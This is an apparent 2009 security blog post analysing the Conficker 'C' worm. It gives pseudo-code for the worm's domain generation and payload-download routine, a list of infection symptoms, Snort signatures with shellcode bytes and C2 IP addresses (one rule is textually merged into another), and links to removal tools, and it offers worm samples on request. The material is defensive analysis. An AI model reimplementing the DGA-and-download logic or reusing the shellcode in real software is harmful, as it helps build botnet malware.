Friday, April 3, 2009

Silence of Storm Worm: Welcome the Rolling Infection of Conficker 'C'

"Conficker .aka. Conflicker .aka. Downup .aka. Downadup .aka. Kido"

Conficker 'C' variant first strike out on the internet during 20-Nov-2008. As this variant has considerable changes compared to those of 'B'. Approximately, 14.9% similar code found in their process images when disassembled.

The details of these images can be found at:
http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

So what makes the difference in variant 'C'? To notice, this new variant of Conficker adds major functionality for P2P co-ordination channel and the revised version of domain generation algorithm (DGA). The main features of Conficker 'C' variant are as follows:

-Capable of incorporating 50,000 randomly generated domain names with the spreading process of 110 TLDs (top-level domains)
-Use of advanced encrytion, digital signatures, and hashing algorithm to protect its zombies from being hijacked. Namely RC4, RSA, and MD6

Conficker.C program logic is give below:


The new hybrid nature of variant 'C' has produced a specifc structure/algorithm for generating more domains in comparison to old 'A' and 'B' classes. The pseudo-code for new DGA is given below:

===========
int domain_name_generation()
{
// local declarations
hMem = 0;
check_if_MS_DEF_PROV();
get_time_from_popular_web_sites();
// baidu.com, google.com, yahoo.com, ask.com, w3.org,
// facebook.com, imageshack.us, rapidshare.com

hMem = GlobalAlloc(0x40u, 0x30D40u); // global array - 50,000 random names
if ( hMem )
{
while ( 1 )
{
counter_domains = counter;
if ( counter >= 50000 )
break;

size_of_name = DGA_random_function() % 6 + 4;
// size of domain name is between 4 and 10 chars
// append "." at the end of the name
random = DGA_random_function();
strcat(domainname, TLD-suffix[random num % 116] );
// append 1 of 116 suffixes (from 110 TLDs) to domain name
++counter;
}

// select and query 500 domains
counter_domains = 0;
while ( !success_download && counter_domains < 500 )
{
// random number modulo 50,000
one_in_50000_names = conficker_D_PRNG_function() % 50,000);
hostent = gethostbyname(one_in_50000_names);
// resolve name to a set of IP addresses
if ( hostent )
{
host_address = hostent->address_list; // get list of IPs
array_previously_checked_IPs[counter_domains] = host_address;

if ( *host_address )
{
// skip if domain name resolves to multiple IP addresses
if ( !*(host_address + 1) )
{
// skip if IP is local host or other trivial IPs
if ( check_IP_value(host_address) )
{
is_blacklisted_ip = check_if_IP_is_in_ranges(host_address);
// skip if IP is blacklisted
if ( ! is_blacklisted_ip )
{
found = 0;
index = 0;
while (index < counter_domains )
{
if (host_address == array_previously_checked_IPs[index] )
{
found = 1;
break; // break if IP has been previously encountered
}
++index;
}
// skip if IP has been previously encountered
if ( !found )
{
snprintf(Dest, 0x80u, "http://%s", host_address);
success_download = download_and_validate_file(Dest);
// HTTP request to the domain and download valid file
}
}
}
}
}
}
Sleep(...); // sleep small random amount
++counter_domains;
}
}
GlobalFree(hMem);
return success_download;
}
===========

Its p2p setup architecture implements the binary download validation, HTTP based date checking through well-known website headers, anti-debugger segments and other logic.


However, there are additional features introduced in this new variant which propogate infection of "millions" of computers world wide putting French and American Air Force, Navy, Hospials, Military networks and even strike out the big giants like Microsoft. For this reason, to step ahead, Microsoft is offering $250,000 to anyone who could report this worm creator. Apart, there are some private firms offering more than $350,000 to half-million US dollars.

The main symptoms of Conficker infection can be inferred from following actions:

1. Account lockout policies being reset automatically.
2. Certain Microsoft Windows services such as Automatic Updates, BITS, Windows Defender, and Error Reporting Services are automatically disabled.
3. Domain controllers respond slowly to client requests.
4. System network gets unusually congested. This can be checked with network traffic chart on Windows Task Manager.
5. On websites related to antivirus software, Windows system updates cannot be accessed.
6. Launches a brute force attack against administrator passwords to help it spread through ADMIN$ shares, making choice of sensible passwords advisable.
7. Port 445/TCP scanning (A/B)
8. Multicast UPnP requests
9. High-port TCP and UDP P2P Activity
10.Up to 500 DNS lookups/HTTP GET request across 110 TLDs per day (C variant)
11.Removal of all System Restore Points
12.High-port (pseudo random) TCP and UDP P2P activity


Detection Mechanisms:

1. Network Detection Signatures

Snort Signature for A/B shellcodes (presented at Honeynet Project)
alert tcp any any -> $HOME_NET 445 (msg: "conficker.a shellcode"; content: "|e8 ff ff ff ff c1|^|8d|N|10 80|1|c4|Af|81|9EPu|f5 ae c6 9d a0|O|85 ea|O|84 c8|O|84 d8|O|c4|O|9c cc|IrX|c4 c4 c4|,|ed c4 c4 c4 94|& 67.15.94.80 $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Worm Activity"; flow:to_server,established; uricontent:"/GeoIP.dat.gz"; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/v-descs/worm_w32_downadup_a.shtml; reference:url,doc.emergingthreats.net/bin/view/Main/2008802; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Conficker; sid:2008802; rev:3;)
--
alert tcp $HOME_NET any -> [75.126.138.202,72.249.118.38,208.78.69.70,204.13.249.70,208.78.68.70] $HTTP_PORTS (msg:"ET CURRENT_EVENTS Possible Downadup/Conficker-A Infection Checking Geographical Location"; flow:to_server; classtype:trojan-activity; reference:url,www.microsoft.com/security/portal/Entry.aspx?Name=Worm%3aWin32%2fConficker.A; reference:url,www.f-secure.com/v-descs/worm_w32_downadup_a.shtml; threshold:type both, count 5, seconds 60, track by_src; reference:url,doc.emergingthreats.net/bin/view/Main/2008803; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/CURRENT_EVENTS/CURRENT_Conficker; sid:2008803; rev:3;)



2. Check your computer for infection (ONLINE)
-http://iv.cs.uni-bonn.de/fileadmin/user_upload/werner/cfdetector/
-http://www.confickerworkinggroup.org/infection_test/cfeyechart.html


3. Removal Tools from various AV companies and security
-http://global.ahnlab.com/global/file_removeal_down.jsp?filename=123718304758%2021&down_filename=v3conficker.zip
-http://download.eset.com/special/EConfickerRemover.exe
-http://data2.kaspersky-labs.com:8080/special/KKiller_v3.4.1.zip
-ftp://ftp.f-secure.com/anti-virus/tools/beta/f-downadup.zip
-http://vil.nai.com/vil/stinger/
-http://www.microsoft.com/downloads/details.aspx?FamilyId=AD724AE0-E72D-4F54-9AB3-75B8EB148356&displaylang=en
-http://www.sophos.com/products/free-tools/conficker-removal-tool.html
-http://www.symantec.com/content/en/us/global/removal_tool/threat_writeups/FixDwndp.exe
-http://www.trendmicro.com/ftp/products/pattern/spyware/fixtool/SysClean-WORM_DOWNAD.zip

More Up-To-Date information of current removal tools at:
http://www.dshield.org/diary.html?storyid=5860

Memory Disinfector
http://iv.cs.uni-bonn.de/uploads/media/memscan_01.zip

Detecting Conficker Files and Registry
http://iv.cs.uni-bonn.de/uploads/media/conficker_names.zip

Nonficker Vaxination Tool
http://iv.cs.uni-bonn.de/uploads/media/nonficker_01.zip

4. Sandbox Detection Results (Conficker C)
-http://mtc.sri.com/Conficker/addendumC/appendix4.html

5. Process Image comparison of Conficker 'B' and 'C'
-http://mtc.sri.com/Conficker/addendumC/HMA_Compare_ConfB2_ConfC/

6. Conficker.C Domain Collisions
-http://iv.cs.uni-bonn.de/uploads/media/c_domains_april2009.zip

7. Domain Generator Filtered Address Ranges
-http://mtc.sri.com/Conficker/addendumC/appendix2.html

Samples of "Conficker" worm are available on special request.